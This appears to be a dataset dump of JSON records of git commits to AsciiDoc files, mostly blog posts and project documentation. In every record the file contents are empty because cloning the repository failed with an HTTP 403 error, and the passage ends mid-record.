sneivandt\/elasticsearch,C-Bish\/elasticsearch,mapr\/elasticsearch,mortonsykes\/elasticsearch,nezirus\/elasticsearch,xuzha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,xuzha\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra5-rc,rmuir\/elasticsearch,naveenhooda2000\/elasticsearch,markharwood\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,andrejserafim\/elasticsearch,JSCooke\/elasticsearch,HonzaKral\/elasticsearch,rhoml\/elasticsearch,JSCooke\/elasticsearch,rhoml\/elasticsearch,i-am-Nathan\/elasticsearch,naveenhooda2000\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra5-rc","old_file":"docs\/reference\/indices\/get-settings.asciidoc","new_file":"docs\/reference\/indices\/get-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2a353d3a20f489c5ea17983cedfb9bb377509fe","subject":"Publish 20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffdd7ca7209fedb7fb7c1552cfbc4bdb4126b3a","subject":"Add to 
NOTES.adoc","message":"Add to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22b4874ff6575564183de0736a8a7a4c33ad3ce3","subject":"Create 2014-10-06-forge-2.12.0.final.asciidoc","message":"Create 2014-10-06-forge-2.12.0.final.asciidoc","repos":"luiz158\/docs,luiz158\/docs,agoncal\/docs,addonis1990\/docs,addonis1990\/docs,forge\/docs,forge\/docs,agoncal\/docs","old_file":"news\/2014-10-06-forge-2.12.0.final.asciidoc","new_file":"news\/2014-10-06-forge-2.12.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6490203e767e27e2a8d90b62e69e53e3f1477357","subject":"Update 2015-12-14-Foo.adoc","message":"Update 2015-12-14-Foo.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-14-Foo.adoc","new_file":"_posts\/2015-12-14-Foo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a128dbea0d00b25961be1382270dcd7515db5ed8","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"541439d17e86b61587e303a91cab62b9d8f8762c","subject":"Update 2017-02-05-hui.adoc","message":"Update 2017-02-05-hui.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-02-05-hui.adoc","new_file":"_posts\/2017-02-05-hui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fd8c9d506283e810b77eced252072f208f07f5e","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa15351865386508dabbeb8fe05a56f2f7c6c79","subject":"Update 2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","message":"Update 
2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","new_file":"_posts\/2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3e53fdd59d2e2ac33977eca2646603c1a8315a7","subject":"CL: tilde\/home directory expansion","message":"CL: tilde\/home directory expansion\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c1029fdf11e9febae1e5da6e4be7e4440b2f8262","subject":"CL: Getting path to a system loaded with ASDF","message":"CL: Getting path to a system loaded with ASDF\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d46e362e75a6886b0be33a3d4f4014e41c06af29","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee47ab0c620cc55de6af410a3afe6ecd722e6cd2","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803f5b2e925100f8f2d865a7ec08f218b7510bc5","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"openshift\/healthdemo\/README.adoc","new_file":"openshift\/healthdemo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"a98b11d8f39815c4585d83451d823f90a0c1d961","subject":"Create 2016-05-13-Engineer-Career-Path.adoc","message":"Create 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8bc879552c00719c4093785b23a8948e9e50c60","subject":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2019-01-31-how-to-learn-Android.adoc'","message":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2019-01-31-how-to-learn-Android.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-how-to-learn-Android.adoc","new_file":"_posts\/2019-01-31-how-to-learn-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17a861c8a68df9724eb1096f89ae5aa5c20756d2","subject":"Fix issue #239 - Replace link to Compose file","message":"Fix issue #239 - Replace link to Compose file\n\nLink to the Compose file in setup has been replaced from https:\/\/github.com\/docker\/labs\/blob\/master\/developer-tools\/java\/scripts\/docker-compose-pull-images.yml to https:\/\/raw.githubusercontent.com\/docker\/labs\/master\/developer-tools\/java\/scripts\/docker-compose-pull-images.yml as pointed by @arun-gupta","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c28136923968fa5bfb7791584a108777813dee7","subject":"Create welcome.adoc","message":"Create welcome.adoc","repos":"ramrexx\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials","old_file":"welcome.adoc","new_file":"welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weslleyrosalem\/CloudForms_Essentials.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd351f46017e29a92e979ee142b6e97ca882b250","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509cae3a7528c16763fb07522cdc7d59b19fdde9","subject":"KUDU-661 Quickstart first draft","message":"KUDU-661 Quickstart first draft\n\nChange-Id: Iac6bcc7ad9eb280124339b4b7c0d1b281e6c4750\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/6175\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cc8ca12bba1bd546a2ec803d5c15d3950519de2","subject":"Update 2015-06-06-A-Re.adoc","message":"Update 2015-06-06-A-Re.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-A-Re.adoc","new_file":"_posts\/2015-06-06-A-Re.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2f5b6f2e63cd7b0bec59a1dd272600f9c00b08c","subject":"Update 2015-07-30-Lost.adoc","message":"Update 2015-07-30-Lost.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-30-Lost.adoc","new_file":"_posts\/2015-07-30-Lost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5830a2e9646c769aaff0d2eb4a34c6aebd973b84","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fe4a09818cd59414b955346fc95034f8f78df51","subject":"Update 2018-10-14-TEST.adoc","message":"Update 2018-10-14-TEST.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-10-14-TEST.adoc","new_file":"_posts\/2018-10-14-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fdce1d99c7fd2de06e29f175e698975ae26638a","subject":"Update 2015-09-10-The-books-every-developer-should-read.adoc","message":"Update 2015-09-10-The-books-every-developer-should-read.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-09-10-The-books-every-developer-should-read.adoc","new_file":"_posts\/2015-09-10-The-books-every-developer-should-read.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147722a407e0b2a1b631b243d23061ac36eb0f46","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83f1781ac9e70096734c0b5e533bdcf144b1986d","subject":"Update index.adoc","message":"Update index.adoc\n\nTypo fix\n","repos":"xjrk58\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/yarn\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/yarn\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd4e9516ad43a7d091996a2db68f32dc906fa610","subject":"constructors","message":"constructors\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7435613e2517a516413415d1f8c8da31d3462128","subject":"Update 2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","message":"Update 2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","new_file":"_posts\/2017-10-01-Probleme-eines-selbstorganisierten-Kollektivs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"6ef6e2035ec5790d7a23affbd32226f01acb8234","subject":"Update 2015-02-11-Test.adoc","message":"Update 2015-02-11-Test.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-Test.adoc","new_file":"_posts\/2015-02-11-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8571c31a15b5f316880c26d2f9d68af4d69e2c9d","subject":"Servlets overview","message":"Servlets overview\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Servlets.adoc","new_file":"Servlets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e833b521d27bd4fb5ae28cdf6400cd5b9656d75f","subject":"y2b create post YouTuber Edition Nest Cam","message":"y2b create post YouTuber Edition Nest Cam","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-11-YouTuber-Edition-Nest-Cam.adoc","new_file":"_posts\/2016-05-11-YouTuber-Edition-Nest-Cam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76bb4a2c52a1db6a8863916d69f9e5653a5ee3db","subject":"Update 2016-01-26-Core-Java-Reading.adoc","message":"Update 2016-01-26-Core-Java-Reading.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e957035d439ff08a2592f04da3dfde998c857b4","subject":"Update 2016-05-09-Home-Office-Setup.adoc","message":"Update 2016-05-09-Home-Office-Setup.adoc","repos":"chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io,chris1234p\/chris1234p.github.io","old_file":"_posts\/2016-05-09-Home-Office-Setup.adoc","new_file":"_posts\/2016-05-09-Home-Office-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chris1234p\/chris1234p.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4931869246f4b42b3073ec151ff55d16eb7c3d99","subject":"y2b create post Ironman in real life?","message":"y2b create post Ironman in real life?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-18-Ironman-in-real-life.adoc","new_file":"_posts\/2014-09-18-Ironman-in-real-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82d62f959967446c773566b720eb13ec94a36cb4","subject":"Update 2015-11-02-Multiples-of-3-and-5.adoc","message":"Update 2015-11-02-Multiples-of-3-and-5.adoc","repos":"Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io","old_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bulletninja\/bulletninja.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbd533cc75ca0dabe8fc808c8cdfcd9ac47b93f","subject":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","message":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c148201d978ca9a5677ef0516085c837614eebdd","subject":"Update 2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","message":"Update 2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","new_file":"_posts\/2016-02-08-Install-skype-43037-on-Cent-O-S-R-H-E-L-Fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"52950717e0c58a2e3aa6c196b682c3c31a41989e","subject":"Polish","message":"Polish\n","repos":"jmnarloch\/spring-boot,shakuzen\/spring-boot,jayarampradhan\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,kamilszymanski\/spring-boot,qerub\/spring-boot,tiarebalbi\/spring-boot,minmay\/spring-boot,spring-projects\/spring-boot,lucassaldanha\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,olivergierke\/spring-boot,jmnarloch\/spring-boot,habuma\/spring-boot,lenicliu\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,shangyi0102\/spring-boot,izeye\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,joshthornhill\/spring-boot,lenicliu\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,bbrouwer\/spring-boot,yangdd1205\/spring-boot,afroje-reshma\/spring-boot-sample,nebhale\/spring-boot,bijukunjummen\/spring-boot,drumonii\/spring-boot,lucassaldanha\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,lexandro\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,jxblum\/spring-boot,jayarampradhan\/spring-boot,lenicliu\/spring-boot,nebhale\/spring-boot,brettwooldridge\/spring-boot,linead\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,lucassaldanha\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,NetoDevel\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,sebastiankirsch\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,lburgazzoli\/spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,felipeg48\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,jvz\/spring-boot,hqrt\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,yhj630520\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,ptahchiev\/spring-boot,hqrt\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,mbogoevici\/spring-boot,ihoneymon\/spring-boot,mbogoevici\/spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,jayarampradhan\/spring-boot,eddumelendez\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot-concourse,NetoDevel\/spring-boot,hello2009chen\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,scottfrederick\/spring-boot,brettwooldr
